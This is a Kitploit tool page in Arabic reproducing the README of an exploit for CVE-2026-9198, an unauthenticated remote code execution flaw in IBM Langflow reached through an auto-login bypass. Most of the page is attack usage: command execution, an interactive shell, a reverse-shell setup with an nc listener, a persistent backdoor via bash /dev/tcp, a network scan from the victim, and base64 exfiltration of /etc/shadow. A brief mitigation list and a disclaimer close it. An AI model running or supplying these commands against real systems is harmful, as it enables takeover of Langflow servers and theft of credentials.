Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-9198 — IBM Langflow غير مصادق عليه RCE عبر Auto-Login Bypass | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
توليد الحمولةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةالمصادقةالفريق الأحمرأداة الوصول عن بعد
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow غير مصادق عليه RCE عبر Auto-Login Bypass

عرض المستودع
11منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
شعار Langflow

🚨 CVE-2026-9198

IBM Langflow OSS ثغرة تنفيذ أوامر عن بُعد غير موثقة عبر تجاوز تسجيل الدخول التلقائي

License: MIT Python 3.6+ Security


📋 نظرة عامة

CVE-2026-9198 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) غير موثقة في IBM Langflow OSS. يستغل هذا الاستغلال ثغرتين:

  • CVE-2026-9103: تجاوز تسجيل الدخول التلقائي يمنح رموز JWT للمستخدم المتميز للمتصلين غير الموثقين
  • CVE-2026-8481: حقن أكواد في نقطة النهاية /api/v1/validate/code يسمح بتنفيذ أكواد Python عشوائية

⚠️ تحذير: هذه الأداة لأغراض الاختبار الأمني المصرح به والتعليم فقط. الاستخدام غير المصرح به غير قانوني.


🚀 الميزات

  • 🔓 تجاوز تسجيل الدخول التلقائي - الحصول تلقائياً على رمز JWT للمستخدم المتميز
  • 💻 صدفة تفاعلية زائفة - موجه ديناميكي مع اسم المستخدم والدليل الحالي
  • 📝 تنفيذ أمر واحد - تشغيل أوامر نظام عشوائية
  • 🔄 صدفة عكسية - توصيل حمولة صدفة عكسية بسطر واحد
  • 🎨 إخراج ملون - ردود بصرية بألوان ANSI
  • ⚡ سريع وموثوق - مبني على معالجة أخطاء متينة

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أعلى
  • مدير الحزم pip

الخطوة 1: استنساخ المستودع

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

الخطوة 2: تثبيت التبعيات

root@kitploit:~
pip install termcolor

أو تثبيت جميع التبعيات مرة واحدة:

root@kitploit:~
pip install -r requirements.txt

الخطوة 3: التحقق من التثبيت

root@kitploit:~
python CVE-2026-9198.py --help

يجب أن تظهر قائمة المساعدة مع جميع الخيارات المتاحة.


🎯 الاستخدام

تنفيذ أمر أساسي

تنفيذ أمر واحد على الهدف:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

مثال:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

الصدفة التفاعلية الزائفة

تشغيل صدفة تفاعلية مع موجهات ديناميكية:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

الميزات:

  • موجه ديناميكي يعرض user@host والدليل الحالي
  • دعم أمر cd مع تحديث تلقائي للموجه
  • سجل الأوامر (حسب الطرفية)
  • تنسيق إخراج نظيف

جلسة مثال:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

الصدفة العكسية

إرسال حمولة صدفة عكسية إلى مستمع:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

مثال:

root@kitploit:~
# على جهازك - تشغيل المستمع
nc -lvnp 4444

# ثم تشغيل الاستغلال
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

منفذ مخصص

إذا كان Langflow يعمل على منفذ غير افتراضي:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

مثال:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

استخدام رمز تم الحصول عليه مسبقاً

تخطي عملية تسجيل الدخول التلقائي واستخدام رمز موجود:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

تكوين المهلة الزمنية

تعديل مهلة HTTP للشبكات البطيئة:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 وسائط سطر الأوامر

الوسيطالوصفمطلوبالافتراضي
-t, --targetالمضيف الهدف/IP أو عنوان URL كامل✅ نعم-
-p, --portمنفذ Langflow❌ لا7860
-c, --cmdتنفيذ أمر واحد❌ لا"id"
--shellوضع الصدفة التفاعلية الزائفة❌ لاFalse
--lhostIP مستمع الصدفة العكسية❌ لا-
--lportمنفذ مستمع الصدفة العكسية❌ لا4444
-k, --tokenاستخدام رمز حامل مقدم❌ لا-
--timeoutمهلة HTTP بالثواني❌ لا20
--no-bannerإخفاء الشعار❌ لاFalse

🔧 أمثلة

1. جمع معلومات أساسي

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. استكشاف نظام الملفات

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# ثم داخل الصدفة:
ls -la
cat /etc/passwd

3. باب خلفي دائم

root@kitploit:~
# إنشاء صدفة عكسية دائمة
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. فحص الشبكة (من الهدف)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. تسريب الملفات الحساسة

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ التخفيف

للحماية من هذه الثغرة:

  1. تعطيل تسجيل الدخول التلقائي في بيئات الإنتاج
  2. تطبيق التصحيحات الصادرة عن IBM لـ Langflow
  3. تقييد الوصول الشبكي إلى واجهات إدارة Langflow
  4. مراقبة الطلبات غير المعتادة لواجهات /api/v1/auto_login و /api/v1/validate/code
  5. استخدام قواعد WAF لحجب أنماط الحمولات المشبوهة

⚠️ إخلاء مسؤولية

هذه الأداة مقدمة لأغراض تعليمية وأمنية مصرح بها فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر يسببه هذا البرنامج. المستخدمون مسؤولون وحدهم عن الامتثال للقوانين واللوائح المعمول بها.


📄 الترخيص

هذا المشروع مرخص تحت رخصة MIT - راجع ملف LICENSE للتفاصيل.


👨‍💻 المؤلف

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • باحث أمني ومختبر اختراق

📚 المراجع

  • تفاصيل CVE-2026-9198
  • CVE-2026-9103 - تجاوز تسجيل الدخول التلقائي
  • CVE-2026-8481 - حقن الأكواد
  • الموقع الرسمي لـ Langflow

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request).

  1. قم بعمل Fork للمستودع
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
  3. قم بعمل Commit للتغييرات (git commit -m 'إضافة ميزة رائعة')
  4. ادفع إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح طلب سحب (Pull Request)

⭐ تاريخ النجوم

إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة ⭐ على GitHub!


مصنوع بـ ❤️ بواسطة 0xgh057r3c0n
تنزيل الأداة